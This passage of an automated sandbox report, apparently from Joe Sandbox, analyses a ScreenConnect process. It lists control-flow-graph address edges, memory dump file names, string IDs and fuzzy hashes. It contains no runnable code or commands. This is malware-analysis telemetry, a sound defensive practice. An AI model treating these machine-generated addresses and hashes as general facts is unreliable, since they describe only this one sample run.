7ffd341370ee-7ffd341370f9 159->169 170 7ffd341370bb-7ffd341370cd 159->170 167->167 175 7ffd341370ff-7ffd3413710e call 7ffd34130e20 169->175 176 7ffd341370fb-7ffd341370fd 169->176 173 7ffd341370cf-7ffd341370d1 170->173 174 7ffd341370d3-7ffd341370e1 call 7ffd34130e20 170->174 179 7ffd341370e4-7ffd341370e7 173->179 174->179 177 7ffd34137111-7ffd34137113 175->177 176->177 182 7ffd341371c8-7ffd341371da 177->182 183 7ffd34137119-7ffd34137130 177->183 179->169 182->47 183->182 187 7ffd34137136-7ffd34137153 183->187 190 7ffd3413715f 187->190 191 7ffd34137155-7ffd3413715d 187->191 192 7ffd34137161-7ffd34137163 190->192 191->192 192->182 193 7ffd34137165-7ffd3413716f 192->193 195 7ffd3413717d-7ffd34137185 193->195 196 7ffd34137171-7ffd3413717b call 7ffd34131870 193->196 198 7ffd341371b3-7ffd341371c6 call 7ffd34136b70 195->198 199 7ffd34137187-7ffd341371ac call 7ffd34135468 195->199 196->47 196->195 198->47 199->198
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: H$X]3$]3
                                                                • API String ID: 0-1673269330
                                                                • Opcode ID: d1f2bc2eaebd7168408474711683ab419b71b85248b3806d3920dd283952b549
                                                                • Instruction ID: 6e7280120f4160d168333d8f1c1e8d55821e7224c2165d960c2c1ec2e94f47f0
                                                                • Opcode Fuzzy Hash: d1f2bc2eaebd7168408474711683ab419b71b85248b3806d3920dd283952b549
                                                                • Instruction Fuzzy Hash: A1422423B1DE464FE795A76888B16F97BD2EF86300F1440BAD19DD72D3DE2CA8059740

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 207 7ffd34135cb1-7ffd34135ce4 call 7ffd34134430 call 7ffd34130c30 * 2 215 7ffd34136a7e-7ffd34136a91 207->215 216 7ffd34135cea-7ffd34135cf8 207->216 218 7ffd34135cfe-7ffd34135d0d call 7ffd34130e20 216->218 219 7ffd34135cfa-7ffd34135cfc 216->219 220 7ffd34135d10-7ffd34135d12 218->220 219->220 223 7ffd34135e52-7ffd34135e55 220->223 224 7ffd34135d18-7ffd34135d34 220->224 225 7ffd34135f90-7ffd34135f97 223->225 226 7ffd34135e5b-7ffd34135e66 223->226 224->223 242 7ffd34135d3a-7ffd34135d4c 224->242 228 7ffd34135f9d-7ffd34135fa4 225->228 229 7ffd34136027-7ffd3413602e 225->229 230 7ffd34135eb2-7ffd34135eb6 226->230 231 7ffd34135e68-7ffd34135e85 226->231 228->229 235 7ffd34135faa-7ffd34135fb4 228->235 232 7ffd34136030-7ffd34136037 229->232 233 7ffd34136039-7ffd3413604c 229->233 234 7ffd34135eb7-7ffd34135ec0 230->234 240 7ffd34136a9b-7ffd34136aac 231->240 241 7ffd34135e8b-7ffd34135eb0 231->241 232->233 238 7ffd34136076-7ffd3413607d 232->238 251 7ffd3413605d-7ffd34136065 233->251 252 7ffd3413604e-7ffd34136053 233->252 234->225 235->238 253 7ffd34135fba-7ffd34136025 235->253 245 7ffd34136083-7ffd3413608a 238->245 246 7ffd341362e1-7ffd341362e8 238->246 292 7ffd34136aad-7ffd34136ab5 240->292 241->230 249 7ffd34135d4e-7ffd34135d6b 242->249 250 7ffd34135d9a-7ffd34135dba 242->250 245->246 254 7ffd34136090-7ffd34136093 245->254 246->215 247 7ffd341362ee-7ffd341362f5 246->247 247->215 257 7ffd341362fb-7ffd3413630d 247->257 269 7ffd34135d71-7ffd34135d82 249->269 270 7ffd34136a92-7ffd34136a9a 249->270 272 7ffd34135d83 250->272 273 7ffd34135dbc-7ffd34135e26 250->273 260 7ffd34136ad1-7ffd34136b22 251->260 261 7ffd3413606b-7ffd3413606f 251->261 252->251 253->238 264 7ffd34136095-7ffd34136097 254->264 265 7ffd3413609c-7ffd341360aa 254->265 267 7ffd3413630f-7ffd3413632c 257->267 268 7ffd34136359-7ffd34136368 257->268 324 7ffd34136b24-7ffd34136b49 260->324 261->238 266 7ffd3413614a-7ffd3413614d 264->266 283 7ffd341360ae 265->283 284 7ffd341360ac 265->284 276 7ffd3413614f-7ffd34136151 266->276 277 7ffd34136156-7ffd34136164 266->277 285 7ffd34136abf-7ffd34136ad0 267->285 286 7ffd34136332-7ffd34136357 267->286 268->215 269->272 288 7ffd34135d84-7ffd34135d98 269->288 270->240 272->288 273->223 326 7ffd34135e28-7ffd34135e50 273->326 291 7ffd34136205-7ffd3413620b 276->291 307 7ffd34136168 277->307 308 7ffd34136166 277->308 293 7ffd341360b0-7ffd341360b3 283->293 284->293 285->260 286->268 288->250 295 7ffd341362bd-7ffd341362bf 291->295 296 7ffd34136211-7ffd34136213 291->296 320 7ffd34136ab6-7ffd34136abe 292->320 300 7ffd341360bd-7ffd341360c8 293->300 301 7ffd341360b5-7ffd341360bb 293->301 295->246 310 7ffd341362c1-7ffd341362c9 295->310 296->295 304 7ffd34136219-7ffd341362bb 296->304 313 7ffd34136114-7ffd34136135 300->313 314 7ffd341360ca-7ffd341360e7 300->314 312 7ffd34136138-7ffd34136148 301->312 304->246 319 7ffd3413616a-7ffd3413616d 307->319 308->319 310->246 321 7ffd341362cb-7ffd341362de 310->321 312->266 313->312 314->292 330 7ffd341360ed-7ffd34136112 314->330 327 7ffd3413616f-7ffd34136203 319->327 328 7ffd34136177-7ffd34136182 319->328 320->285 321->246 355 7ffd34136b4b-7ffd34136ba9 324->355 326->223 327->291 335 7ffd341361ce-7ffd341361dc 328->335 336 7ffd34136184-7ffd34136190 328->336 330->313 341 7ffd341361de 335->341 342 7ffd34136197-7ffd341361a1 335->342 342->320 346 7ffd341361a7-7ffd341361cc 342->346 346->335 368 7ffd34136bab-7ffd34136bd1 355->368
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PM3$XM3
                                                                • API String ID: 0-75653409
                                                                • Opcode ID: 5a22aadb3e5dbc267e162e717abcb7664474b9382209f4b11a44c5a715dfa9cf
                                                                • Instruction ID: 7b32201d515363c05105716f7e88ba514e2666f1e40bc78ae7384023214e356a
                                                                • Opcode Fuzzy Hash: 5a22aadb3e5dbc267e162e717abcb7664474b9382209f4b11a44c5a715dfa9cf
                                                                • Instruction Fuzzy Hash: 19224323B2CE8A4BEBF5AA2894F52F537D1EF96710F0401BAD54DD71E7DD2CA8029241

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 447 7ffd34135ec4-7ffd34135ec9 448 7ffd34135ecf-7ffd34135eee 447->448 449 7ffd34135f90-7ffd34135f97 447->449 457 7ffd34135ef0-7ffd34135f0d 448->457 458 7ffd34135f3a-7ffd34135f4a 448->458 450 7ffd34135f9d-7ffd34135fa4 449->450 451 7ffd34136027-7ffd3413602e 449->451 450->451 454 7ffd34135faa-7ffd34135fb4 450->454 452 7ffd34136030-7ffd34136037 451->452 453 7ffd34136039-7ffd3413604c 451->453 452->453 456 7ffd34136076-7ffd3413607d 452->456 469 7ffd3413605d-7ffd34136065 453->469 470 7ffd3413604e-7ffd34136053 453->470 454->456 471 7ffd34135fba-7ffd34136025 454->471 462 7ffd34136083-7ffd3413608a 456->462 463 7ffd341362e1-7ffd341362e8 456->463 465 7ffd34135f13-7ffd34135f38 457->465 466 7ffd34136aa4-7ffd34136aac 457->466 458->449 462->463 472 7ffd34136090-7ffd34136093 462->472 467 7ffd34136a7e-7ffd34136a91 463->467 468 7ffd341362ee-7ffd341362f5 463->468 465->458 490 7ffd34136aad-7ffd34136ab5 466->490 468->467 473 7ffd341362fb-7ffd3413630d 468->473 474 7ffd34136ad1-7ffd34136b22 469->474 475 7ffd3413606b-7ffd3413606f 469->475 470->469 471->456 477 7ffd34136095-7ffd34136097 472->477 478 7ffd3413609c-7ffd341360aa 472->478 481 7ffd3413630f-7ffd3413632c 473->481 482 7ffd34136359-7ffd34136368 473->482 528 7ffd34136b24-7ffd34136b49 474->528 475->456 479 7ffd3413614a-7ffd3413614d 477->479 493 7ffd341360ae 478->493 494 7ffd341360ac 478->494 486 7ffd3413614f-7ffd34136151 479->486 487 7ffd34136156-7ffd34136164 479->487 496 7ffd34136abf-7ffd34136ad0 481->496 497 7ffd34136332-7ffd34136357 481->497 482->467 495 7ffd34136205-7ffd3413620b 486->495 511 7ffd34136168 487->511 512 7ffd34136166 487->512 513 7ffd34136ab6-7ffd34136abe 490->513 500 7ffd341360b0-7ffd341360b3 493->500 494->500 505 7ffd341362bd-7ffd341362bf 495->505 506 7ffd34136211-7ffd34136213 495->506 496->474 497->482 508 7ffd341360bd-7ffd341360c8 500->508 509 7ffd341360b5-7ffd341360bb 500->509 505->463 515 7ffd341362c1-7ffd341362c9 505->515 506->505 514 7ffd34136219-7ffd341362bb 506->514 518 7ffd34136114-7ffd34136135 508->518 519 7ffd341360ca-7ffd341360e7 508->519 517 7ffd34136138-7ffd34136148 509->517 522 7ffd3413616a-7ffd3413616d 511->522 512->522 513->496 514->463 515->463 524 7ffd341362cb-7ffd341362de 515->524 517->479 518->517 519->490 533 7ffd341360ed-7ffd34136112 519->533 529 7ffd3413616f-7ffd34136203 522->529 530 7ffd34136177-7ffd34136182 522->530 524->463 554 7ffd34136b4b-7ffd34136ba9 528->554 529->495 536 7ffd341361ce-7ffd341361dc 530->536 537 7ffd34136184-7ffd34136190 530->537 533->518 543 7ffd341361de 536->543 544 7ffd34136197-7ffd341361a1 536->544 544->513 546 7ffd341361a7-7ffd341361cc 544->546 546->536 568 7ffd34136bab-7ffd34136bd1 554->568
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PM3$XM3
                                                                • API String ID: 0-75653409
                                                                • Opcode ID: 9e13033f704b30a60155698b9d744cf2f1942fa9e08ecf253514855cfd4daf82
                                                                • Instruction ID: b20dfcbcabc5e5828789525613ac2e7e3b5c11ce354672c4d1bd1315ae380517
                                                                • Opcode Fuzzy Hash: 9e13033f704b30a60155698b9d744cf2f1942fa9e08ecf253514855cfd4daf82
                                                                • Instruction Fuzzy Hash: AEB16363B1DE864BE7F6AA2854F51F53BD0EF42724B0801BAD18CDB1E7DD1C68069281

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 613 7ffd34135f4c-7ffd34135f4e 614 7ffd34135f80-7ffd34135f81 613->614 615 7ffd34135f50-7ffd34135f5a 613->615 620 7ffd34135f88-7ffd34135f89 614->620 616 7ffd34135f68-7ffd34135f72 615->616 617 7ffd34135f5c-7ffd34135f66 call 7ffd341354f8 615->617 619 7ffd34135f74-7ffd34135f7e call 7ffd34131870 616->619 616->620 617->614 617->616 619->614 619->620 623 7ffd34135f90-7ffd34135f97 620->623 625 7ffd34135f9d-7ffd34135fa4 623->625 626 7ffd34136027-7ffd3413602e 623->626 625->626 629 7ffd34135faa-7ffd34135fb4 625->629 627 7ffd34136030-7ffd34136037 626->627 628 7ffd34136039-7ffd3413604c 626->628 627->628 630 7ffd34136076-7ffd3413607d 627->630 637 7ffd3413605d-7ffd34136065 628->637 638 7ffd3413604e-7ffd34136053 628->638 629->630 639 7ffd34135fba-7ffd34136025 629->639 633 7ffd34136083-7ffd3413608a 630->633 634 7ffd341362e1-7ffd341362e8 630->634 633->634 640 7ffd34136090-7ffd34136093 633->640 635 7ffd34136a7e-7ffd34136a91 634->635 636 7ffd341362ee-7ffd341362f5 634->636 636->635 641 7ffd341362fb-7ffd3413630d 636->641 642 7ffd34136ad1-7ffd34136b22 637->642 643 7ffd3413606b-7ffd3413606f 637->643 638->637 639->630 645 7ffd34136095-7ffd34136097 640->645 646 7ffd3413609c-7ffd341360aa 640->646 648 7ffd3413630f-7ffd3413632c 641->648 649 7ffd34136359-7ffd34136368 641->649 689 7ffd34136b24-7ffd34136b49 642->689 643->630 647 7ffd3413614a-7ffd3413614d 645->647 657 7ffd341360ae 646->657 658 7ffd341360ac 646->658 651 7ffd3413614f-7ffd34136151 647->651 652 7ffd34136156-7ffd34136164 647->652 660 7ffd34136abf-7ffd34136ad0 648->660 661 7ffd34136332-7ffd34136357 648->661 649->635 659 7ffd34136205-7ffd3413620b 651->659 673 7ffd34136168 652->673 674 7ffd34136166 652->674 664 7ffd341360b0-7ffd341360b3 657->664 658->664 667 7ffd341362bd-7ffd341362bf 659->667 668 7ffd34136211-7ffd34136213 659->668 660->642 661->649 670 7ffd341360bd-7ffd341360c8 664->670 671 7ffd341360b5-7ffd341360bb 664->671 667->634 676 7ffd341362c1-7ffd341362c9 667->676 668->667 675 7ffd34136219-7ffd341362bb 668->675 679 7ffd34136114-7ffd34136135 670->679 680 7ffd341360ca-7ffd341360e7 670->680 678 7ffd34136138-7ffd34136148 671->678 683 7ffd3413616a-7ffd3413616d 673->683 674->683 675->634 676->634 685 7ffd341362cb-7ffd341362de 676->685 678->647 679->678 693 7ffd34136aad-7ffd34136ab5 680->693 694 7ffd341360ed-7ffd34136112 680->694 690 7ffd3413616f-7ffd34136203 683->690 691 7ffd34136177-7ffd34136182 683->691 685->634 718 7ffd34136b4b-7ffd34136ba9 689->718 690->659 697 7ffd341361ce-7ffd341361dc 691->697 698 7ffd34136184-7ffd34136190 691->698 709 7ffd34136ab6-7ffd34136abe 693->709 694->679 704 7ffd341361de 697->704 705 7ffd34136197-7ffd341361a1 697->705 708 7ffd341361a7-7ffd341361cc 705->708 705->709 708->697 709->660 732 7ffd34136bab-7ffd34136bd1 718->732
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PM3$XM3
                                                                • API String ID: 0-75653409
                                                                • Opcode ID: 54a274b1237ac93abcf40a338e294ead5a4f6d8be93f42438a1ce446327f3e9b
                                                                • Instruction ID: 6ee96b57658db12e35bc555f986a65efe6b7a208db6362e23e8c06a9ca61f20e
                                                                • Opcode Fuzzy Hash: 54a274b1237ac93abcf40a338e294ead5a4f6d8be93f42438a1ce446327f3e9b
                                                                • Instruction Fuzzy Hash: C1614063F2DE874AEBFAAA2804B56B477C0FF56740F0801BED55ED71D6DE2CA8019241

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 736 7ffd3413046f-7ffd3413048e 737 7ffd34130490-7ffd341304c6 736->737 738 7ffd341304d8-7ffd34130500 736->738 743 7ffd34130524-7ffd3413053c 738->743 744 7ffd34130502-7ffd34130521 738->744 748 7ffd34130560-7ffd3413057e 743->748 749 7ffd3413053e-7ffd3413055d 743->749 744->743 753 7ffd34130580-7ffd34130590 748->753 754 7ffd3413059a 748->754 749->748 757 7ffd34130597-7ffd34130598 753->757 756 7ffd3413059f-7ffd341305a5 754->756 758 7ffd3413063e-7ffd34130641 756->758 759 7ffd341305ab-7ffd341305b4 756->759 757->754 760 7ffd34130643-7ffd3413064d 758->760 761 7ffd34130698-7ffd341306b6 call 7ffd341300e0 * 2 758->761 762 7ffd341305cd-7ffd341305d8 759->762 763 7ffd341305b6-7ffd341305c3 759->763 769 7ffd34130655-7ffd3413066e 760->769 779 7ffd34130800-7ffd3413081e call 7ffd341300e0 * 2 761->779 780 7ffd341306ba-7ffd341306c6 761->780 765 7ffd34130624-7ffd34130632 762->765 766 7ffd341305da-7ffd341305f7 762->766 763->762 768 7ffd341305c5-7ffd341305cb 763->768 765->758 773 7ffd341305fd-7ffd34130622 766->773 774 7ffd341308e2-7ffd3413093f 766->774 768->762 781 7ffd341306df-7ffd341306ea 769->781 782 7ffd34130670-7ffd34130672 769->782 773->765 807 7ffd34130941-7ffd3413094a 774->807 808 7ffd3413094b-7ffd34130952 774->808 815 7ffd341308bd-7ffd341308df 779->815 816 7ffd34130824-7ffd3413082e 779->816 787 7ffd341306c8-7ffd341306ca 780->787 788 7ffd341306cc-7ffd341306d5 call 7ffd34130100 780->788 791 7ffd341306eb-7ffd341306ec 781->791 789 7ffd341306ee-7ffd341306fa 782->789 790 7ffd34130674 782->790 794 7ffd341306dd-7ffd341306de 787->794 801 7ffd341306da 788->801 797 7ffd34130700-7ffd34130701 789->797 798 7ffd341306fc-7ffd341306fe 789->798 790->780 796 7ffd34130676-7ffd3413067a 790->796 791->789 794->781 796->791 802 7ffd3413067c-7ffd34130681 796->802 805 7ffd34130702-7ffd3413070e call 7ffd34130100 797->805 803 7ffd34130711-7ffd34130715 798->803 801->794 802->805 810 7ffd34130683-7ffd3413068e 802->810 806 7ffd34130716-7ffd3413072e 803->806 805->803 825 7ffd34130730-7ffd34130732 806->825 826 7ffd34130734-7ffd34130742 call 7ffd34130100 806->826 813 7ffd3413095e-7ffd34130969 808->813 814 7ffd34130954-7ffd3413095d 808->814 817 7ffd341306ff 810->817 818 7ffd34130690-7ffd34130695 810->818 815->774 820 7ffd34130830-7ffd34130832 816->820 821 7ffd34130834-7ffd34130842 call 7ffd34130100 816->821 817->797 818->806 824 7ffd34130697 818->824 827 7ffd34130845-7ffd34130862 820->827 821->827 824->761 829 7ffd34130745-7ffd34130762 825->829 826->829 835 7ffd34130864-7ffd34130866 827->835 836 7ffd34130868-7ffd34130876 call 7ffd34130100 827->836 837 7ffd34130764-7ffd34130766 829->837 838 7ffd34130768-7ffd34130776 call 7ffd34130100 829->838 839 7ffd34130879-7ffd34130896 835->839 836->839 842 7ffd34130779-7ffd3413078f 837->842 838->842 847 7ffd34130898-7ffd3413089a 839->847 848 7ffd3413089c-7ffd341308aa call 7ffd34130100 839->848 849 7ffd34130791-7ffd341307a4 call 7ffd34130100 842->849 850 7ffd341307a6-7ffd341307ad 842->850 851 7ffd341308ad-7ffd341308b6 847->851 848->851 849->850 857 7ffd341307cd-7ffd341307d0 849->857 856 7ffd341307b4-7ffd341307c7 850->856 851->815 856->857 858 7ffd341307d2-7ffd341307e5 call 7ffd34130100 857->858 859 7ffd341307e7-7ffd341307fa 857->859 858->779 858->859 859->779
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \3
                                                                • API String ID: 0-486386732
                                                                • Opcode ID: 37252ef3c5ea6080153892a7333acaeacc07e12d639c8e3ba2d4022fb2f156a8
                                                                • Instruction ID: 7e1af83130bfbfb09f2c078e9d50f031cf519f0615814f3b26a576460a79b23f
                                                                • Opcode Fuzzy Hash: 37252ef3c5ea6080153892a7333acaeacc07e12d639c8e3ba2d4022fb2f156a8
                                                                • Instruction Fuzzy Hash: E5F1E472B1DE4A4FE799E62C84B57B53BD1EF9A310F1440B9E58DC728ADD2CE8418340

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3412723842.00007FFD33E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd33e20000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: MitigationPolicyProcess
                                                                • String ID:
                                                                • API String ID: 1088084561-0
                                                                • Opcode ID: 48e11b3511a07aaf862a418e3f5b1c0af5f6dbbb3eac3cf3ac857fd0534c9420
                                                                • Instruction ID: 34b2393d3674507dd7f050feba5e032c4fbf3a7fd95021202d468870ad1e4602
                                                                • Opcode Fuzzy Hash: 48e11b3511a07aaf862a418e3f5b1c0af5f6dbbb3eac3cf3ac857fd0534c9420
                                                                • Instruction Fuzzy Hash: 02514931D0CB494FEB24AFA89C5A5F97BE0EF55351F04027FE089D3192DE68A846CB91

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1006 7ffd33e23aa2-7ffd33e280ef 1008 7ffd33e280f6-7ffd33e28150 SetProcessMitigationPolicy 1006->1008 1009 7ffd33e28152 1008->1009 1010 7ffd33e28158-7ffd33e28187 1008->1010 1009->1010
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3412723842.00007FFD33E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd33e20000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: MitigationPolicyProcess
                                                                • String ID:
                                                                • API String ID: 1088084561-0
                                                                • Opcode ID: d99375ab3e6c735731dfdc6f56b659ab6795e9d22106fa926d6aeb515d69b9ed
                                                                • Instruction ID: a04dc66e796fb8bc6bb2bbd621e9c846a43a721c642cc242aa43104904270308
                                                                • Opcode Fuzzy Hash: d99375ab3e6c735731dfdc6f56b659ab6795e9d22106fa926d6aeb515d69b9ed
                                                                • Instruction Fuzzy Hash: 0821D731918B188FDB28AF9D984AAF977E0EB65711F00422EE049D3251DB74B8458B91

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1012 7ffd34134de5-7ffd34134df1 1013 7ffd34134df3 1012->1013 1014 7ffd34134df5-7ffd34134e11 1012->1014 1013->1014 1015 7ffd34134e35-7ffd34134e3b 1013->1015 1018 7ffd34134e18-7ffd34134e1a 1014->1018 1016 7ffd34134e3d-7ffd34134e52 1015->1016 1017 7ffd34134e54-7ffd34134e69 1015->1017 1016->1017 1023 7ffd34134eb3-7ffd34134eed 1017->1023 1024 7ffd34134e6b-7ffd34134ea6 1017->1024 1021 7ffd34134e20-7ffd34134e33 1018->1021 1022 7ffd34134ea9-7ffd34134eb2 1018->1022 1021->1015 1031 7ffd34134ef0-7ffd34134ef2 1023->1031 1024->1022 1033 7ffd34134ef4-7ffd34134f01 1031->1033 1034 7ffd34134f3c-7ffd34134f3f 1031->1034 1033->1031 1038 7ffd34134f03-7ffd34134f0b 1033->1038 1036 7ffd34134f41 1034->1036 1037 7ffd34134fbb 1034->1037 1040 7ffd34134f43-7ffd34134f4b 1036->1040 1041 7ffd34134f87-7ffd34134f94 1036->1041 1039 7ffd34134fbc-7ffd34134fc6 1037->1039 1042 7ffd34134f11-7ffd34134f17 1038->1042 1043 7ffd34135128-7ffd3413513a 1038->1043 1054 7ffd34134fc8 1039->1054 1040->1039 1045 7ffd34134f4d-7ffd34134f4f 1040->1045 1044 7ffd34134f97-7ffd34134fa9 1041->1044 1042->1043 1046 7ffd34134f1d-7ffd34134f23 1042->1046 1053 7ffd34134fac-7ffd34134fba 1044->1053 1049 7ffd34134f51 1045->1049 1050 7ffd34134fcb-7ffd34134fd4 1045->1050 1046->1043 1052 7ffd34134f29-7ffd34134f2f 1046->1052 1049->1044 1055 7ffd34134f53-7ffd34134f57 1049->1055 1051 7ffd34134fd6-7ffd34134fdd 1050->1051 1056 7ffd34134fdf-7ffd34134fe8 1051->1056 1052->1043 1057 7ffd34134f35-7ffd34134f3b 1052->1057 1053->1037 1054->1050 1055->1054 1058 7ffd34134f59-7ffd34134f5e 1055->1058 1061 7ffd34134fed-7ffd34134fff 1056->1061 1057->1034 1057->1053 1058->1056 1059 7ffd34134f60-7ffd34134f65 1058->1059 1059->1051 1060 7ffd34134f67-7ffd34134f6c 1059->1060 1060->1061 1062 7ffd34134f6e-7ffd34134f82 1060->1062 1065 7ffd34135006-7ffd34135008 1061->1065 1062->1041 1062->1043 1065->1043 1066 7ffd3413500e-7ffd34135014 1065->1066 1066->1043 1067 7ffd3413501a-7ffd34135020 1066->1067 1067->1043 1068 7ffd34135026-7ffd3413502c 1067->1068 1068->1043 1069 7ffd34135032-7ffd34135051 1068->1069 1069->1043
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: P'3
                                                                • API String ID: 0-1611138016
                                                                • Opcode ID: 706c6ef1e837a195ba196d5d9797d28a56c43df6586ee91caaee701ce93d2cd0
                                                                • Instruction ID: bbdedeb625f7f46923f817ad921e4ce7fcedaaa85b14c430e22d230046bc3bdf
                                                                • Opcode Fuzzy Hash: 706c6ef1e837a195ba196d5d9797d28a56c43df6586ee91caaee701ce93d2cd0
                                                                • Instruction Fuzzy Hash: F9912873B0CE4A0BEBA9EA2884B14B533D1EF56760B58027ED54DC7586EE1DFC069381

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1122 7ffd34137050-7ffd34137061 1125 7ffd34137063-7ffd34137065 1122->1125 1126 7ffd34137067-7ffd34137075 call 7ffd34130e20 1122->1126 1127 7ffd34137078-7ffd34137081 1125->1127 1126->1127 1131 7ffd34137088-7ffd3413708f 1127->1131 1132 7ffd341371de-7ffd341371fc call 7ffd34130c30 * 2 1131->1132 1133 7ffd34137095-7ffd3413709c 1131->1133 1142 7ffd341371fe-7ffd34137208 1132->1142 1143 7ffd34137226-7ffd34137244 call 7ffd34130c30 * 2 1132->1143 1133->1132 1134 7ffd341370a2-7ffd341370b9 1133->1134 1139 7ffd341370ee-7ffd341370f9 1134->1139 1140 7ffd341370bb-7ffd341370cd 1134->1140 1153 7ffd341370ff-7ffd3413710e call 7ffd34130e20 1139->1153 1154 7ffd341370fb-7ffd341370fd 1139->1154 1150 7ffd341370cf-7ffd341370d1 1140->1150 1151 7ffd341370d3-7ffd341370e1 call 7ffd34130e20 1140->1151 1145 7ffd3413721c 1142->1145 1146 7ffd3413720a-7ffd3413721a 1142->1146 1167 7ffd341372fb-7ffd34137306 1143->1167 1168 7ffd3413724a-7ffd34137255 1143->1168 1152 7ffd3413721e-7ffd3413721f 1145->1152 1146->1152 1158 7ffd341370e4-7ffd341370e7 1150->1158 1151->1158 1152->1143 1155 7ffd34137111-7ffd34137113 1153->1155 1154->1155 1163 7ffd341371c8-7ffd341371da 1155->1163 1164 7ffd34137119-7ffd34137130 1155->1164 1158->1139 1163->1132 1164->1163 1171 7ffd34137136-7ffd34137153 1164->1171 1175 7ffd34137308-7ffd3413730a 1167->1175 1176 7ffd3413730c-7ffd3413731b call 7ffd34130e20 1167->1176 1173 7ffd34137257-7ffd34137259 1168->1173 1174 7ffd3413725b-7ffd3413726a call 7ffd34130e20 1168->1174 1191 7ffd3413715f 1171->1191 1192 7ffd34137155-7ffd3413715d 1171->1192 1177 7ffd3413726d-7ffd341372a1 1173->1177 1174->1177 1180 7ffd3413731e-7ffd34137320 1175->1180 1176->1180 1177->1167 1189 7ffd341372a3-7ffd341372b1 1177->1189 1182 7ffd34137472-7ffd3413747d 1180->1182 1183 7ffd34137326-7ffd34137347 1180->1183 1193 7ffd341372b3-7ffd341372bb 1189->1193 1194 7ffd341372c4-7ffd341372cc 1189->1194 1195 7ffd34137161-7ffd34137163 1191->1195 1192->1195 1196 7ffd341372cd-7ffd341372ce 1193->1196 1198 7ffd341372bd-7ffd341372c2 1193->1198 1194->1196 1197 7ffd341372de-7ffd341372f8 1194->1197 1195->1163 1199 7ffd34137165-7ffd3413716f 1195->1199 1200 7ffd341372d3-7ffd341372dd call 7ffd34136b80 1196->1200 1197->1167 1198->1200 1203 7ffd3413717d-7ffd34137185 1199->1203 1204 7ffd34137171-7ffd3413717b call 7ffd34131870 1199->1204 1200->1197 1209 7ffd341371b3-7ffd341371c6 call 7ffd34136b70 1203->1209 1210 7ffd34137187-7ffd341371ac call 7ffd34135468 1203->1210 1204->1132 1204->1203 1209->1132 1210->1209
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: H
                                                                • API String ID: 0-2852464175
                                                                • Opcode ID: 6cee102f36fdafaa9a684f5b10913921e3212cd2cb532d4731335c32b614da81
                                                                • Instruction ID: 988a0ec3f293b592646f7f6c46ea06e8217b12d5ccc88d0e91791f42a7e5d22f
                                                                • Opcode Fuzzy Hash: 6cee102f36fdafaa9a684f5b10913921e3212cd2cb532d4731335c32b614da81
                                                                • Instruction Fuzzy Hash: 9471A833F18D074AEB69E72485B16B972D2EF85344F508139D66ED22C1DE2DB806AA40
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
